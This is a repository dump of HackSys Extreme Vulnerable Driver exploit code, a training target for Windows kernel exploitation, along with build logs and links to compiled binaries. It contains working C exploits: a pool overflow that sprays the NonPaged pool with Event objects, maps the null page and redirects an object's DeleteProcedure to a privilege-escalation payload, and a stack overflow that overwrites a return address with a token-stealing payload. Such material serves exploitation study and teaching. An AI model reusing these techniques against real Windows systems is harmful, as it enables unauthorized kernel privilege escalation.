155 | if (!UserModeBuffer) {
156 | DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
157 | exit(EXIT_FAILURE);
158 | }
159 | else {
160 | DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
161 | DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
162 | }
163 |
164 | DEBUG_INFO("\t\t[+] Mapping Null Page\n");
165 |
166 | if (!MapNullPage()) {
167 | DEBUG_ERROR("\t\t[-] Failed Mapping Null Page: 0x%X\n", GetLastError());
168 | exit(EXIT_FAILURE);
169 | }
170 |
171 | DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");
172 |
173 | RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);
174 |
175 | // Restore POOL_HEADER and set TypeIndex to 0x00 (TypeIndex is UChar)
176 | Memory = (PVOID)((ULONG)UserModeBuffer + (ULONG)POOL_BUFFER_SIZE);
177 | *(PULONG)Memory = (ULONG)0x04080040;
178 | Memory = (PVOID)((ULONG)Memory + 0x4);
179 | *(PULONG)Memory = (ULONG)0xee657645;
180 | Memory = (PVOID)((ULONG)Memory + 0x4);
181 | *(PULONG)Memory = (ULONG)0x00000000;
182 | Memory = (PVOID)((ULONG)Memory + 0x4);
183 | *(PULONG)Memory = (ULONG)0x00000040;
184 | Memory = (PVOID)((ULONG)Memory + 0x4);
185 | *(PULONG)Memory = (ULONG)0x00000000;
186 | Memory = (PVOID)((ULONG)Memory + 0x4);
187 | *(PULONG)Memory = (ULONG)0x00000000;
188 | Memory = (PVOID)((ULONG)Memory + 0x4);
189 | *(PULONG)Memory = (ULONG)0x00000001;
190 | Memory = (PVOID)((ULONG)Memory + 0x4);
191 | *(PULONG)Memory = (ULONG)0x00000001;
192 | Memory = (PVOID)((ULONG)Memory + 0x4);
193 | *(PULONG)Memory = (ULONG)0x00000000;
194 | Memory = (PVOID)((ULONG)Memory + 0x4);
195 | *(PULONG)Memory = (ULONG)0x00080000;
196 |
197 | DEBUG_INFO("\t\t\t[+] TypeIndex Of Event Object Set To: 0x0\n");
198 |
199 | DEBUG_INFO("\t\t[+] Preparing OBJECT_TYPE_INITIALIZER At Null Page\n");
200 |
201 | // Set the DeleteProcedure to the address of our payload
202 | *(PULONG)0x00000060 = (ULONG)EopPayload;
203 |
204 | DEBUG_INFO("\t\t\t[+] DeleteProcedure: 0x%X\n", *(PULONG)0x00000060);
205 | DEBUG_INFO("\t\t\t[+] DeleteProcedure Address: 0x%p\n", (ULONG)0x00000060);
206 |
207 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
208 |
209 | DEBUG_INFO("\t\t[+] Preparing NonPaged Kernel Pool Layout\n");
210 |
211 | DEBUG_INFO("\t\t\t[+] Spraying With Event Objects\n");
212 |
213 | // Spray the NonPaged Pool
214 | SprayNonPagedPoolWithEventObjects();
215 |
216 | DEBUG_INFO("\t\t\t[+] Creating Holes By Coalescing\n");
217 |
218 | // Create the holes for the vulnerable buffer
219 | CreateHolesInNonPagedPoolByCoalescingEventObjects();
220 |
221 | DEBUG_MESSAGE("\t[+] Triggering Pool Overflow\n");
222 |
223 | OutputDebugString("****************Kernel Mode****************\n");
224 |
225 | // Allocate the vulnerable buffer in one of the holes we created
226 | DeviceIoControl(hFile,
227 | HACKSYS_EVD_IOCTL_POOL_OVERFLOW,
228 | (LPVOID)UserModeBuffer,
229 | (DWORD)UserModeBufferSize,
230 | NULL,
231 | 0,
232 | &BytesReturned,
233 | NULL);
234 |
235 | OutputDebugString("****************Kernel Mode****************\n");
236 |
237 | DEBUG_INFO("\t\t[+] Triggering Payload\n");
238 |
239 | DEBUG_INFO("\t\t\t[+] Freeing Event Objects\n");
240 |
241 | // Free the NonPaged Pool
242 | FreeEventObjects();
243 |
244 | HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);
245 |
246 | UserModeBuffer = NULL;
247 | }
248 | __except (EXCEPTION_EXECUTE_HANDLER) {
249 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
250 | exit(EXIT_FAILURE);
251 | }
252 |
253 | return EXIT_SUCCESS;
254 | }
255 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/PoolOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | PoolOverflow.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Pool Overflow Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __POOL_OVERFLOW_H__
52 | #define __POOL_OVERFLOW_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | #define POOL_BUFFER_SIZE 504
59 | #define TYPE_INDEX_OVERWRITE 40
60 |
61 | HANDLE EventObjectArrayA[10000];
62 | HANDLE EventObjectArrayB[5000];
63 |
64 | VOID FreeEventObjects();
65 | VOID SprayNonPagedPoolWithEventObjects();
66 | DWORD WINAPI PoolOverflowThread(LPVOID Parameter);
67 | VOID CreateHolesInNonPagedPoolByCoalescingEventObjects();
68 |
69 | #endif //__POOL_OVERFLOW_H__
70 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/ArbitraryOverwrite.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/ArbitraryOverwrite.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Common.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Common.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\ARBITRARYOVERWRITE.OBJ
2 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\cl.command.1.tlog
3 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\CL.read.1.tlog
4 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\CL.write.1.tlog
5 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\COMMON.OBJ
6 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.EXE
7 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.EXE.INTERMEDIATE.MANIFEST
8 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.OBJ
9 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.PDB
10 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.write.1.tlog
11 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\INTEGEROVERFLOW.OBJ
12 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\link.command.1.tlog
13 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\link.read.1.tlog
14 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\link.write.1.tlog
15 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\mt.command.1.tlog
16 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\mt.read.1.tlog
17 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\mt.write.1.tlog
18 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\NULLPOINTERDEREFERENCE.OBJ
19 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\PAYLOADS.OBJ
20 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\POOLOVERFLOW.OBJ
21 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\STACKOVERFLOW.OBJ
22 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\STACKOVERFLOWGS.OBJ
23 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\TYPECONFUSION.OBJ
24 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\UNINITIALIZEDHEAPVARIABLE.OBJ
25 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\UNINITIALIZEDSTACKVARIABLE.OBJ
26 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\USEAFTERFREE.OBJ
27 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\VC100.PDB
28 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.exe
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Release|Win32|C:\HackSysExtremeVulnerableDriver\Exploit\Source\|
3 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.log:
--------------------------------------------------------------------------------
1 | Build started 2/1/2017 4:33:09 AM.
2 | Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" on node 2 (rebuild target(s)).
3 | _PrepareForClean:
4 | Deleting file "Release\HackSysEVDExploit.lastbuildstate".
5 | InitializeBuildStatus:
6 | Creating "Release\HackSysEVDExploit.unsuccessfulbuild" because "AlwaysCreate" was specified.
7 | ClCompile:
8 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\CL.exe /c /Zi /nologo /W3 /WX- /O2 /Oi /Oy- /GL /D _MBCS /Gm- /EHsc /MD /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"Release\\" /Fd"Release\vc100.pdb" /Gd /TC /analyze- /errorReport:prompt ArbitraryOverwrite.c Common.c HackSysEVDExploit.c IntegerOverflow.c NullPointerDereference.c PoolOverflow.c Payloads.c StackOverflow.c StackOverflowGS.c TypeConfusion.c UninitializedHeapVariable.c UninitializedStackVariable.c UseAfterFree.c
9 | ArbitraryOverwrite.c
10 | Common.c
11 | HackSysEVDExploit.c
12 | IntegerOverflow.c
13 | NullPointerDereference.c
14 | PoolOverflow.c
15 | Payloads.c
16 | StackOverflow.c
17 | StackOverflowGS.c
18 | TypeConfusion.c
19 | UninitializedHeapVariable.c
20 | UninitializedHeapVariable.c(73): warning C4101: 'i' : unreferenced local variable
21 | UninitializedStackVariable.c
22 | UseAfterFree.c
23 | Link:
24 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\link.exe /ERRORREPORT:PROMPT /OUT:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.exe" /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"Release\HackSysEVDExploit.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.pdb" /OPT:REF /OPT:ICF /LTCG /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.lib" /MACHINE:X86 Release\ArbitraryOverwrite.obj
25 | Release\Common.obj
26 | Release\HackSysEVDExploit.obj
27 | Release\IntegerOverflow.obj
28 | Release\NullPointerDereference.obj
29 | Release\PoolOverflow.obj
30 | Release\Payloads.obj
31 | Release\StackOverflow.obj
32 | Release\StackOverflowGS.obj
33 | Release\TypeConfusion.obj
34 | Release\UninitializedHeapVariable.obj
35 | Release\UninitializedStackVariable.obj
36 | Release\UseAfterFree.obj
37 | Generating code
38 | Finished generating code
39 | HackSysEVDExploit.vcxproj -> C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.exe
40 | Manifest:
41 | C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\mt.exe /nologo /verbose /outputresource:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.exe;#1" /manifest Release\HackSysEVDExploit.exe.intermediate.manifest
42 | FinalizeBuildStatus:
43 | Deleting file "Release\HackSysEVDExploit.unsuccessfulbuild".
44 | Touching "Release\HackSysEVDExploit.lastbuildstate".
45 | Done Building Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" (rebuild target(s)).
46 |
47 | Build succeeded.
48 |
49 | Time Elapsed 00:00:02.76
50 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit1.exe
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/IntegerOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/IntegerOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/NullPointerDereference.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/NullPointerDereference.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Payloads.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Payloads.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/PoolOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/PoolOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflowGS.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflowGS.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/TypeConfusion.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/TypeConfusion.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedHeapVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedHeapVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedStackVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedStackVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UseAfterFree.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UseAfterFree.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/vc100.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflow.c
43 |
44 | Abstract:
45 | This module implements the exploit for Stack Overflow
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "StackOverflow.h"
52 |
53 | DWORD WINAPI StackOverflowThread(LPVOID Parameter) {
54 | HANDLE hFile = NULL;
55 | ULONG BytesReturned;
56 | PVOID MemoryAddress = NULL;
57 | PULONG UserModeBuffer = NULL;
58 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
59 | PVOID EopPayload = &TokenStealingPayloadWin7;
60 | SIZE_T UserModeBufferSize = (BUFFER_SIZE + RET_OVERWRITE) * sizeof(ULONG);
61 |
62 | __try {
63 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
64 |
65 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
66 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
67 | }
68 | else {
69 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
70 | }
71 |
72 | // Get the device handle
73 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
74 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
75 |
76 | hFile = GetDeviceHandle(FileName);
77 |
78 | if (hFile == INVALID_HANDLE_VALUE) {
79 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
80 | exit(EXIT_FAILURE);
81 | }
82 | else {
83 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
84 | }
85 |
86 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
87 |
88 | DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");
89 |
90 | UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
91 | HEAP_ZERO_MEMORY,
92 | UserModeBufferSize);
93 |
94 | if (!UserModeBuffer) {
95 | DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
96 | exit(EXIT_FAILURE);
97 | }
98 | else {
99 | DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
100 | DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
101 | }
102 |
103 | DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");
104 |
105 | RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);
106 |
107 | MemoryAddress = (PVOID)(((ULONG)UserModeBuffer + UserModeBufferSize) - sizeof(ULONG));
108 | *(PULONG)MemoryAddress = (ULONG)EopPayload;
109 |
110 | DEBUG_INFO("\t\t\t[+] RET Value: 0x%p\n", *(PULONG)MemoryAddress);
111 | DEBUG_INFO("\t\t\t[+] RET Address: 0x%p\n", MemoryAddress);
112 |
113 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
114 |
115 | DEBUG_MESSAGE("\t[+] Triggering Kernel Stack Overflow\n");
116 |
117 | OutputDebugString("****************Kernel Mode****************\n");
118 |
